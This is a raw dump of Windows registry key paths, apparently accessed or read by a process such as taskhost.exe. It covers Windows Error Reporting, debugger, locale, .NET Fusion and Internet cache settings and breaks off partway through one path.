HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\Software\Classes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\taskhost.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\WerSvcGroup HKEY_CURRENT_USER HKEY_USERS\.DEFAULT\Control Panel\International HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName HKEY_USERS\.DEFAULT\Control Panel\International\sCountry HKEY_USERS\.DEFAULT\Control Panel\International\sList HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal HKEY_USERS\.DEFAULT\Control Panel\International\sThousand HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime HKEY_USERS\.DEFAULT\Control Panel\International\s1159 HKEY_USERS\.DEFAULT\Control Panel\International\s2359 HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate HKEY_USERS\.DEFAULT\Control Panel\International\iCountry HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize HKEY_USERS\.DEFAULT\Control Panel\International\iDigits HKEY_USERS\.DEFAULT\Control Panel\International\iLZero HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber HKEY_USERS\.DEFAULT\Control Panel\International\NumShape HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wersvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceMain HKEY_LOCAL_MACHINE HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ServiceTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Category HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Name HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParentFolder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Description HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\RelativePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParsingName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InfoTip HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalizedName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Icon HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Security HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResource HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResourceType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalRedirectOnly HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Roamable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PreCreate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Stream HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PublishExpandedPath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Attributes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\FolderTypeID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InitFolderHandler HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PropertyBag HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Windows Error Reporting HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TraceFlags HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Debug HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AeDebug HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNT HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Plugins\AppRecorder HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Plugins\FDR\CurrentSession HKEY_CURRENT_USER\Software\Microsoft\Windiff HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID HKEY_CURRENT_USER\Control Panel\International HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Consent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\NewUserDefaultConsent HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\BEX64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LoggingDisabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontShowUI HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableArchive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ConfigureArchive HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableQueue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxQueueCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceQueue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ExcludedApplications HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DebugApplications HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\SendEFSFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Windows Error Reporting HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\BEX64 HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LoggingDisabled HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontShowUI HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableArchive HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ConfigureArchive HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableQueue HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxQueueCount HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceQueue HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ExcludedApplications HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DebugApplications HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\SendEFSFiles HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerServer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseSSL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerPortNumber HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseAuthentication HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC\RacWerSampleTime HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Throttling\BEX64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\BIOSVersion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\HeapControlledList\taskhost.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\taskhost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\SYSTEM32\ntdll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\kernel32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\KERNELBASE.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\msvcrt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\ole32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\GDI32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\USER32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\LPK.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\USP10.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\RPCRT4.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\OLEAUT32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\IMM32.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\MSCTF.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\ADVAPI32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\SYSTEM32\sechost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\SspiCli.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\CRYPTBASE.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\CLBCatQ.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\RacEngn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\AEPIC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls\C:\Windows\system32\VERSION.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\6FD5A890 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\LocalDumps HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\102652EB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet 